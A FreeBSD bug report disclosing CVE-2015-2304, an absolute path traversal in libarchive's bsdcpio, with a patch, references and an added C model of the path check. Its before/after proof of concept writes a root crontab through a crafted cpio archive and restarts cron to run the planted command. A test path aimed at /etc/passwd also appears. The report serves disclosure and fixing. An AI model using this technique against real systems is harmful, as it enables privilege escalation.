[Bug 206386] vendor/libarchive: directory traversal vulnerability/local denial of services
bugzilla-noreply at freebsd.org
Mon Jan 18 23:57:27 UTC 2016
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=206386
Bug ID: 206386
Summary: vendor/libarchive: directory traversal vulnerability/local denial of services
Product: Base System
Version: 11.0-CURRENT
Hardware: Any
OS: Any
Status: New
Keywords: patch, security
Severity: Affects Many People
Priority: ---
Component: bin
Assignee: freebsd-bugs at FreeBSD.org
Reporter: junovitch at freebsd.org
CC: secteam at FreeBSD.org
Flags: mfc-stable9?, mfc-stable10?
Created attachment 165785
--> https://bugs.freebsd.org/bugzilla/attachment.cgi?id=165785&action=edit
vendor/libarchive/dist: Apply CVE-2015-2304 patch
Affects: All supported versions of FreeBSD
CVE Name: CVE-2015-2304
Problem Description:
Absolute path traversal vulnerability in bsdcpio in libarchive 3.1.2 and
earlier allows remote attackers to write to arbitrary files via a full pathname
in an archive.
Impact:
The issue could be exploited to write arbitrary files as the user invoking cpio
against a specially crafted cpio archive, which could be leveraged to obtain
elevated privileges.
Workaround:
No workaround is available, but systems where a privileged user does not
make use of cpio archives without proper validation are not affected.
References:
- https://github.com/libarchive/libarchive/pull/110
- https://github.com/libarchive/libarchive/commit/5935715
- http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2304
COMMIT LOG FOR ATTACHED PATCH:
Apply upstream changeset 5935715:
Add ARCHIVE_EXTRACT_SECURE_NOABSOLUTEPATHS option
This fixes a directory traversal in the cpio tool.
PR: XXXXXX
Security: CVE-2015-2304
Note: I would be more than glad to commit the patch with an 'Approved by' for
src and MFV from head/contrib/libarchive with svn merge -c rXXXXXX
^/vendor/libarchive/dist .
EXAMPLE BEFORE:
##### Generate something for the Proof of concept
# echo '*/1 * * * * echo "Do something evil" > /etc/evil.txt' > /var/cron/tabs/root
##### Package it up
# echo '/var/cron/tabs/root' | cpio -ov > test.cpio
##### Clean up
# rm /var/cron/tabs/root
##### Show it's not there yet
# cat /etc/evil.txt
cat: /etc/evil.txt: No such file or directory
##### Unpackage our "trojaned" file
# cpio -iv < test.cpio
/var/cron/tabs/root
1 block
##### Show it's in place
# cat /var/cron/tabs/root
*/1 * * * * echo "Do something evil" > /etc/evil.txt
##### Since this didn't update spool dir mtime, be impatient and restart cron to see the impact
# service cron restart
# cat /etc/evil.txt
Do something evil
EXAMPLE AFTER:
##### Unpackage our "trojaned" file
# /usr/local/bin/bsdcpio -iv < test.cpio
/var/cron/tabs/root
/var/cron/tabs/root: Path is absolute
1 block
##### Show it's in place
# cat /var/cron/tabs/root
cat: /var/cron/tabs/root: No such file or directory
Note: /usr/local/bin/bsdcpio is the patched variant I just committed with the
same patch in ports (https://svnweb.FreeBSD.org/changeset/ports/406624).
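As an added illustration (not the attached patch and not libarchive's own code), the following C model shows the kind of member-name check the new ARCHIVE_EXTRACT_SECURE_NOABSOLUTEPATHS option introduces, and goes one step further by also refusing ".." components as libarchive's existing ARCHIVE_EXTRACT_SECURE_NODOTDOT option does. The flag bit values, the vet_member_path function and the sample names are assumptions constructed for this example; the first sample is the path from the PoC above.

```c
#include <stdio.h>
#include <string.h>

/* Option bits modelled on libarchive's ARCHIVE_EXTRACT_SECURE_NOABSOLUTEPATHS
 * (added by the fix for CVE-2015-2304) and ARCHIVE_EXTRACT_SECURE_NODOTDOT.
 * The bit values and the checker below are an illustration, not libarchive code. */
#define SECURE_NOABSOLUTEPATHS 0x1u   /* refuse member names starting with '/' */
#define SECURE_NODOTDOT        0x2u   /* refuse member names with a ".." component */

enum path_verdict { PATH_OK = 0, PATH_ABSOLUTE = 1, PATH_DOTDOT = 2 };

/* Vet an archive member name before it becomes an extraction target.
 * Returns PATH_OK, or the reason the name must be refused. */
enum path_verdict vet_member_path(const char *name, unsigned flags)
{
    if (name[0] == '/' && (flags & SECURE_NOABSOLUTEPATHS))
        return PATH_ABSOLUTE;           /* what patched bsdcpio reports as "Path is absolute" */

    if (flags & SECURE_NODOTDOT) {
        /* Walk the name one '/'-separated component at a time; only a component
         * that is exactly ".." is rejected ("..foo" is a legitimate file name). */
        const char *p = name;
        for (;;) {
            const char *end = strchr(p, '/');
            size_t len = end != NULL ? (size_t)(end - p) : strlen(p);
            if (len == 2 && p[0] == '.' && p[1] == '.')
                return PATH_DOTDOT;
            if (end == NULL)
                break;
            p = end + 1;
        }
    }
    return PATH_OK;
}

int main(void)
{
    /* Constructed member names; the first is the path used in the report's PoC. */
    static const char *const samples[] = {
        "/var/cron/tabs/root", "etc/../../etc/passwd", "usr/local/bin/tool", "a/..b/c"
    };
    static const char *const verdict[] = {
        "ok", "refused: Path is absolute", "refused: '..' component"
    };
    unsigned flags = SECURE_NOABSOLUTEPATHS | SECURE_NODOTDOT;
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-24s %s\n", samples[i], verdict[vet_member_path(samples[i], flags)]);
    return 0;
}
```

Without SECURE_NOABSOLUTEPATHS the first sample passes, which is exactly the pre-patch bsdcpio behaviour shown in EXAMPLE BEFORE.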